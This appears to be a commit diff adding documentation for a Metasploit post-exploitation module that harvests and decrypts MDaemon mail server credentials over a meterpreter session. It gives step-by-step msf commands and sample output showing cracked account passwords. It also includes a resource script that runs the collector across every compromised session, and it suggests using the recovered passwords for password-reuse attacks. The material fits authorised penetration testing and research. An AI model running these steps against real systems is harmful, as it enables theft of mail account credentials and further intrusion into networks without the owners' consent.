|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +Download and install the email server: [www.altn.com](http://www.altn.com/Downloads/MDaemon-Mail-Server-Free-Trial/) |
| 4 | + |
| 5 | +You require a valid licence, but there's a demo for 30 days. |
| 6 | + |
| 7 | +### Verified |
| 8 | + |
| 9 | +1. AWS --> Microsoft Windows Server 2012 R2 Base - ami-8d0acfed Instance: t2.micro @ July-August 2016 x64 bits with meterpreter 64 bits. |
| 10 | +2. AWS --> Microsoft Windows Server 2012 R2 Base - ami-8d0acfed Instance: t2.micro @ July-August 2016 x64 bits with meterpreter 32 bits. Worked, but couldn't find the path through Register. |
| 11 | +3. VM --> Microsoft Windows 7 on VMWare. |
| 12 | + |
| 13 | +## Verification Steps |
| 14 | + |
| 15 | +1. Get a meterpreter on a windows machine that has MDaemon installed. |
| 16 | +2. Load the module: `use post/windows/gather/credentials/mdaemon_cred_collector` |
| 17 | +3. Set the correct session on the module. |
| 18 | + 1. Optional: you can add the remote path of the installation, especially if the software is installed on a strange path and the module can't find it.. |
| 19 | +4. Run the module and enjoy the loot. |
| 20 | + |
| 21 | +## Example Run |
| 22 | +**Normal mode** |
| 23 | +``` |
| 24 | +msf > use post/windows/gather/credentials/mdaemon_cred_collector |
| 25 | +msf > set SESSION 1 |
| 26 | +msf > exploit |
| 27 | +``` |
| 28 | + |
| 29 | +Output: |
| 30 | + |
| 31 | +``` |
| 32 | +[+] Configuration file found: C:\MDaemon\App\userlist.dat |
| 33 | +[+] Found MDaemons on WIN-F7ANP3JL4GJ via session ID: 1 |
| 34 | +[*] Extracted: MDaemon:p0%AhBxvs4IZ |
| 35 | +[*] Extracted: webmaster:Manuel123. |
| 36 | +[*] SMTP credentials saved in: /root/.msf4/loot/20160831194802_default_127.0.0.1_MDaemon.smtp_ser_754168.txt |
| 37 | +[*] Extracted: webmaster:Manuel123. |
| 38 | +[*] POP3 credentials saved in: /root/.msf4/loot/20160831194802_default_127.0.0.1_MDaemon.pop3_ser_608271.txt |
| 39 | +[*] Extracted: webmaster:Manuel123. |
| 40 | +[*] IMAP credentials saved in: /root/.msf4/loot/20160831194802_default_127.0.0.1_MDaemon.imap_ser_769125.txt |
| 41 | +[*] Post module execution completed |
| 42 | +``` |
| 43 | + |
| 44 | +**Verbose true** |
| 45 | +``` |
| 46 | +msf > use post/windows/gather/credentials/mdaemon_cred_collector |
| 47 | +msf > set SESSION 1 |
| 48 | +msf > set verbose true |
| 49 | +msf > exploit |
| 50 | +``` |
| 51 | + |
| 52 | +Output: |
| 53 | + |
| 54 | +``` |
| 55 | +[*] Searching MDaemon installation at C: |
| 56 | +[*] Found MDaemon installation at C: |
| 57 | +[*] Searching MDaemon installation at C: |
| 58 | +[*] Found MDaemon installation at C: |
| 59 | +[*] Searching MDaemon installation at C:\Program Files |
| 60 | +[*] Searching MDaemon installation at C:\Program Files (x86) |
| 61 | +[*] Searching MDaemon installation at C:\Program Files |
| 62 | +[*] Checking for Userlist in MDaemons directory at: C:\MDaemon\App |
| 63 | +[+] Configuration file found: C:\MDaemon\App\userlist.dat |
| 64 | +[+] Found MDaemons on WIN-F7ANP3JL4GJ via session ID: 1 |
| 65 | +[*] Downloading UserList.dat file to tmp file: SFJOXMHZEFWA |
| 66 | +[*] Cracking xJiKYdun7OvjVLnM |
| 67 | +[*] Password p0%AhBxvs4IZ |
| 68 | +[*] Cracking ocnTldjRpaejTg== |
| 69 | +[*] Password Manuel123. |
| 70 | +[*] Collected the following credentials: |
| 71 | +[*] Usernames: 2 |
| 72 | +[*] Passwords: 2 |
| 73 | +[*] Deleting tmp file: SFJOXMHZEFWA |
| 74 | +[*] Extracted: MDaemon:p0%AhBxvs4IZ |
| 75 | +[*] Extracted: webmaster:Manuel123. |
| 76 | +[*] SMTP credentials saved in: /root/.msf4/loot/20160831194819_default_127.0.0.1_MDaemon.smtp_ser_114741.txt |
| 77 | +[*] Extracted: webmaster:Manuel123. |
| 78 | +[*] POP3 credentials saved in: /root/.msf4/loot/20160831194819_default_127.0.0.1_MDaemon.pop3_ser_369240.txt |
| 79 | +[*] Extracted: webmaster:Manuel123. |
| 80 | +[*] IMAP credentials saved in: /root/.msf4/loot/20160831194819_default_127.0.0.1_MDaemon.imap_ser_028427.txt |
| 81 | +[*] Post module execution completed |
| 82 | +``` |
| 83 | + |
| 84 | +## Options |
| 85 | + |
| 86 | + **RPATH** |
| 87 | + The remote path of the MDaemon installation. |
| 88 | + If the machine runs on 64bits and the meterpreter is 32 bits, it won't be able to find the installation path in the registry, but it will search some default paths. If it is installed on a non-default path you can give the RPATH and it will work. |
| 89 | + |
| 90 | +## Scenarios |
| 91 | +**Run on all sessions** |
| 92 | +If you wish to run the post against all sessions from framework, here is how: |
| 93 | + |
| 94 | +1. Create the following resource script: |
| 95 | +``` |
| 96 | +framework.sessions.each_pair do |sid, session| |
| 97 | + run_single("use post/windows/gather/credentials/mdaemon_cred_collector") |
| 98 | + run_single("set SESSION #{sid}") |
| 99 | + run_single("run") |
| 100 | +end |
| 101 | +``` |
| 102 | +2. At the msf prompt, execute the above resource script: |
| 103 | +`msf > resource path-to-resource-script` |
| 104 | + |
| 105 | +**Meterpreter on email server** |
| 106 | + |
| 107 | +If you have a meterpreter running on a server that has MDaemon installed, run the module and you will get all the users and passwords of the email server. Quite useful for trying password reuse and/or checking the strength of the passwords. |
| 108 | + |
| 109 | +Note: MDaemon can store the passwords on a database, in that case the module won't work, but you can search for the database location, username and password and still get them :) |
| 110 | + |
| 111 | + |
| 112 | +## References |
| 113 | +http://www.securityfocus.com/bid/4686 |
| 114 | + |
| 115 | +https://github.com/AgoraSecurity/MdaemonCrack |
0 commit comments